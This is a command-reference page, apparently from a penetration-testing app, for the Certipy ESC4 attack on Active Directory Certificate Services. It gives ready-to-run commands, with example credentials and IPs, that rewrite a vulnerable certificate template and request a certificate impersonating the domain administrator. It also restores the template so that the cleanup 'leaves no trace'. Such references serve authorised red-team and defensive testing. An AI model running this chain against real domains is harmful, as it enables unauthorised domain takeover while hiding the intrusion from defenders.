Certipy Template Edit (ESC4)

ESC4: when you have GenericWrite/WriteOwner over a template, rewrite its security descriptor / flags to make it ESC1-style vulnerable, then restore the original. -save-configuration takes a backup before modifying so cleanup leaves no trace. Verified against Certipy v5.x parser.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy template -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -template '<template>' -write-default-configuration -save-configuration '<template>.json'

Credential variants

The same attack using a different authentication material.

Restore From Backup requires password

certipy template -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -template '<template>' -write-configuration '<template>.json'

No Backup requires password

certipy template -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -template '<template>' -write-default-configuration -no-save

Examples

certipy template -u 'jdoe@corp.local' -p 'Password123!' -dc-ip 10.10.10.10 -template 'WebServer' -write-default-configuration -save-configuration WebServer.json
certipy req -u 'jdoe@corp.local' -p 'Password123!' -dc-ip 10.10.10.10 -ca 'CORP-CA' -template 'WebServer' -upn 'administrator@corp.local'
certipy template -u 'jdoe@corp.local' -p 'Password123!' -dc-ip 10.10.10.10 -template 'WebServer' -write-configuration WebServer.json

Tags

certipy adcs esc4 template writeowner genericwrite

References